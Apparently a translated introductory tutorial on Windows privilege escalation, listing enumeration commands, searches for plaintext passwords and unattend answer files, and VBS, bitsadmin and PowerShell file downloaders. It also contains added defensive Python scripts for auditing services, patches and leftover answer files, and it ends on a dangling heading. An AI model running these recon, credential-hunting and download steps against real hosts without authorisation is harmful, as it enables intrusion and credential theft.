Introduction
This article is an introduction to Windows elevation of privilege. It is not a comprehensive guide, but it tries to cover the main techniques; a list of commonly used resources is given at the bottom of the article for reference.
Windows privilege elevation basics
Initial information collection
Before starting to escalate privileges, we need to collect basic information about the operating system: installed software, operating system version, logged-on users, listening ports, running processes, and so on.
Determine the operating system name and version
C:\users\sanr> systeminfo | findstr /b /c:"OS Name" /c:"OS Version"
View the host name
c:\users\sanr> hostname
View all environment variables
View users and the details of one user
c:\users\sanr> net user
c:\users\sanr> net user sanr
View logged-on users
c:\users\sanr> query user
Query the terminal services (RDP) port
c:\users\sanr> reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Network connection
Let's take a look at the system's network settings – Basic networks, routing, firewalls, etc.
View IP DNS addresses
C:\users\sanr> ipconfig /all
To view the routing table:
C:\users\sanr> route print
To view the ARP cache:
View network connections
C:\users\sanr> netstat -ano
To view firewall rules:
c:\users\sanr> netstat -ano
c:\users\sanr> netsh firewall show config
c:\users\sanr> netsh firewall show state
Applications and Services
View scheduled tasks on the system
C:\users\sanr> schtasks /query /fo list /v
To view the process ID of each service:
C:\users\sanr> tasklist /svc
To view a list of installed drivers:
C:\users\sanr> driverquery
To view the Windows services that have been started:
c:\users\sanr> net start
View a service's startup configuration and the account it runs as
C:\users\sanr> sc qc mysqla
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: mysqla
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "D:\Program files\phpstudy\mysql\bin\mysqld.exe" MySQLa
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : mysqla
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
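The `sc qc` output above is something an administrator reviews as much as an attacker does: the fields that matter are START_TYPE, BINARY_PATH_NAME and SERVICE_START_NAME. The following Python script is an added example, not part of the original article, that parses that output (a constructed copy of the mysqla sample is embedded, so it runs offline) and summarizes the account the service runs as, whether it starts automatically, and whether its image path is quoted. The field names follow the real `sc qc` layout; `SYSTEM_ACCOUNTS`, `parse_sc_qc`, `image_path` and `summarize_service` are this example's own names.

```python
# Constructed copy of the article's `sc qc mysqla` output; not captured from a
# live host. A raw string keeps the backslashes in the path intact.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: mysqla
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "D:\Program files\phpstudy\mysql\bin\mysqld.exe" MySQLa
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : mysqla
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Account names that mean "runs with full SYSTEM privileges" (this example's own list).
SYSTEM_ACCOUNTS = {"localsystem", r".\localsystem", r"nt authority\system"}


def parse_sc_qc(text: str) -> dict:
    """Parse `sc qc <service>` output into {FIELD_NAME: value}.

    Only lines shaped like `UPPER_CASE_NAME : value` are taken, so the
    "[SC] QueryServiceConfig SUCCESS" banner is skipped. Splitting on the
    first colon keeps drive letters (D:\...) inside the value.
    """
    config = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key = key.strip()
        if not sep or not key or not key.replace("_", "").isalpha() or not key.isupper():
            continue
        config[key] = value.strip()
    return config


def image_path(binary_path_name: str) -> str:
    """Return only the executable from BINARY_PATH_NAME, dropping service arguments."""
    field = binary_path_name.strip()
    if field.startswith('"'):
        end = field.find('"', 1)
        return field[1:end] if end != -1 else field[1:]
    return field.split(" ", 1)[0]


def summarize_service(text: str) -> dict:
    """Pull out the facts a reviewer checks first: account, start type, image path."""
    cfg = parse_sc_qc(text)
    bin_field = cfg.get("BINARY_PATH_NAME", "")
    account = cfg.get("SERVICE_START_NAME", "")
    exe = image_path(bin_field)
    return {
        "name": cfg.get("SERVICE_NAME", ""),
        "account": account,
        "runs_as_system": account.lower() in SYSTEM_ACCOUNTS,
        "auto_start": cfg.get("START_TYPE", "").startswith("2"),  # 2 = AUTO_START
        "image": exe,
        "image_quoted": bin_field.startswith('"'),
        "image_has_spaces": " " in exe,
    }


if __name__ == "__main__":
    for key, val in summarize_service(SAMPLE_SC_QC).items():
        print(f"{key:17}: {val}")
```

On a live host, feed the script the output of `sc qc <name>` for each service from `net start`; a service that runs as LocalSystem, starts automatically, and whose image lives outside a protected directory is the one to look at more closely (checking the ACL on that directory is a separate step this parser does not do).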
Use WMIC to get valuable data
View a list of installed programs for its version
c:\users\sanr> wmic product list brief
To view a list of services, processes, or startup programs:
c:\users\sanr> wmic service list brief   # lists services
c:\users\sanr> wmic process list brief   # lists processes
c:\users\sanr> wmic startup list brief   # lists startup items
Check for installed updates and installation dates
c:\users\sanr> wmic qfe get caption,description,hotfixid,installedon
Search for a specific patch; if it is missing, the corresponding known vulnerability may be usable to elevate privileges
c:\users\sanr> wmic qfe get caption,description,hotfixid,installedon | findstr /c:"KBxxxxxxx"
# Replace KBxxxxxxx with the patch you are looking for, e.g. KB3000061
If the command above produces no output, the patch is not installed.
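The same `findstr` test, run from the defender's side, is a patch-baseline check: does the host have every KB it is supposed to have? The Python script below is an added example, not code from the original article. It parses a constructed sample of `wmic qfe get caption,description,hotfixid,installedon` output (KB3000061 is the id the article mentions; KB1111111, KB2222222 and KB9999999 are placeholders) and lists which ids from a required set are absent. One caveat the one-liner hides: an id can be absent because a later cumulative update superseded it, so confirm the superseding KB before treating the host as unpatched.

```python
import re

# Constructed sample of `wmic qfe get caption,description,hotfixid,installedon`
# output. It is not data from a real host: KB3000061 is the id used in the
# article, and the other two ids are placeholders.
SAMPLE_QFE_OUTPUT = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=1111111  Update           KB1111111  9/1/2014
http://support.microsoft.com/?kbid=2222222  Security Update  KB2222222  10/15/2014
http://support.microsoft.com/?kbid=3000061  Security Update  KB3000061  10/15/2014
"""

# A hotfix id is "KB" followed by six or seven digits; the Caption column
# spells it as "kbid=<digits>", which this pattern deliberately does not match.
KB_RE = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)


def installed_hotfixes(qfe_output: str) -> set:
    """Return the set of KB ids (upper-cased) that appear in `wmic qfe` output."""
    found = set()
    for line in qfe_output.splitlines():
        for kb in KB_RE.findall(line):
            found.add(kb.upper())
    return found


def missing_hotfixes(qfe_output: str, required) -> list:
    """List the required KB ids that are absent from the output, in order.

    This is the article's `findstr /c:"KBxxxxxxx"` test applied to a whole
    list at once. An absent id means the patch is not installed, or that it
    was superseded by a later update, so check the superseding KB as well
    before treating the host as vulnerable.
    """
    have = installed_hotfixes(qfe_output)
    return [kb for kb in required if kb.upper() not in have]


if __name__ == "__main__":
    baseline = ["KB3000061", "KB2222222", "KB9999999"]  # hypothetical required set
    print("installed:", sorted(installed_hotfixes(SAMPLE_QFE_OUTPUT)))
    print("missing:  ", missing_hotfixes(SAMPLE_QFE_OUTPUT, baseline))
```

To use it against a real host, redirect the `wmic qfe` output to a file and pass its contents to `missing_hotfixes` together with the list of KBs your patch policy requires.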
Sensitive data and directories
Check for unencrypted passwords, or other interesting files that may hold sensitive information:
c:\users\sanr> cd \
c:\users\sanr> dir /b /s password.txt   # searches the whole filesystem for files named password.txt
C:\users\sanr> dir /b /s config.*       # searches the whole filesystem for files whose name starts with "config"
c:\users\sanr> findstr /si password *.xml *.ini *.txt
c:\users\sanr> findstr /si login *.xml *.ini *.txt
In addition, check for unattended-installation answer files. These files typically contain base64-encoded passwords. You are more likely to find them in a large enterprise, where installing each system by hand is impractical. Their common locations are:
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\windows\panther\unattend\unattended.xml
c:\windows\panther\unattended.xml
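The four locations above are also the places a hardening review should check, because an answer file left behind after deployment is a credential exposure whether or not anyone has found it yet. This added Python script (not from the original article) walks those paths, parses any XML it finds, and reports each `<Password>` or `<AdministratorPassword>` element together with its `<PlainText>` flag, without returning the value. The XML fragment embedded in the script is constructed for the example, and `UNATTEND_CANDIDATES`, `find_credentials` and `scan_paths` are this example's own names.

```python
import os
import xml.etree.ElementTree as ET

# Locations listed in the article.
UNATTEND_CANDIDATES = [
    r"C:\sysprep.inf",
    r"C:\sysprep\sysprep.xml",
    r"C:\windows\panther\unattend\unattended.xml",
    r"C:\windows\panther\unattended.xml",
]

# Constructed answer-file fragment, not taken from any real deployment. The
# first value is base64 of the made-up string "Placeholder"; the second is a
# made-up clear-text value.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UGxhY2Vob2xkZXI=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Placeholder1</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

# Elements that carry a credential in the unattend schema.
CREDENTIAL_ELEMENTS = {"Password", "AdministratorPassword"}


def find_credentials(xml_text: str) -> list:
    """Report each credential-bearing element that has a non-empty <Value>.

    Each record gives the element name, whether <PlainText> says the value is
    clear text (None if the flag is absent) and the value's length. The value
    itself is not returned: the purpose is to locate leftover answer files so
    they can be deleted, not to read the passwords out of them.
    """
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        tag = elem.tag.split("}")[-1]  # drop the xmlns prefix
        if tag not in CREDENTIAL_ELEMENTS:
            continue
        value, plain = "", None
        for child in elem:
            ctag = child.tag.split("}")[-1]
            if ctag == "Value":
                value = (child.text or "").strip()
            elif ctag == "PlainText":
                plain = (child.text or "").strip().lower() == "true"
        if value:
            findings.append({"element": tag, "plaintext": plain, "value_length": len(value)})
    return findings


def scan_paths(paths=UNATTEND_CANDIDATES) -> list:
    """Check the candidate locations; any leftover file is itself a finding."""
    report = []
    for path in paths:
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8-sig", errors="replace") as fh:
            text = fh.read()
        try:
            creds = find_credentials(text)
        except ET.ParseError:
            creds = None  # sysprep.inf is INI rather than XML; still report the file
        report.append({"path": path, "credentials": creds})
    return report


if __name__ == "__main__":
    print(find_credentials(SAMPLE_UNATTEND))
    print(scan_paths())
```

A non-empty report from `scan_paths` on a production host means the file should be removed (and the account's password rotated, since it has been on disk in recoverable form), regardless of whether `plaintext` is true or false.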
Directory file Operations
List all directories under d:\www:
for /d %i in (d:\www\*) do @echo %i
Display only the folders under the current path whose names are 1 to 3 characters long:
for /d %i in (???) do @echo %i
Using the current directory as the search root, list all EXE files in it and in its subdirectories:
for /r %i in (*.exe) do @echo %i
List all files in the specified directory and its subdirectories, using that directory as the search root:
for /r "F:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
Display the contents of a.txt (the example below uses c:\1.txt); /f reads the file line by line:
for /f %i in (c:\1.txt) do echo %i
rar package:
c:\users\sanr> rar a -k -r -s -m3 c:\1.rar c:\folder
PHP read file:
c:\users\sanr> c:/php/php.exe "c:/www/admin/1.php"
<?php
$file_handle = fopen("f:/config.asp", "r");
while (!feof($file_handle)) {
    echo fgets($file_handle);
}
fclose($file_handle);
?>
Using system programs to download files
With this information, we can now begin the process of actually elevating our privileges.
A VBS downloader lets us get files onto the machine; it works by downloading a file from a URL to the local computer (network access is required):
' downloadfile.vbs
' Set your settings
strFileURL = "http://127.0.0.1/text.ico"
strHDLocation = "D:\text.ico"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send

If objXMLHTTP.Status = 200 Then ' HTTP 200 OK
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 ' adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 ' Set the stream position to the start

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If

Set objXMLHTTP = Nothing
This script runs on any version of Windows; execute it as follows.
C:\users\sanr> cscript.exe downloadfile.vbs
On Windows 7 and above, bitsadmin or PowerShell can be used instead:
C:\users\sanr> bitsadmin /transfer n http://www.jd.com/favicon.ico d:\text.ico
C:\users\sanr> powershell (New-Object System.Net.WebClient).DownloadFile('http://www.jd.com/favicon.ico', 'text.ico')
There are other ways to download files, such as FTP, PHP or Python; choose according to your needs.
Windows privilege elevation Basics and commands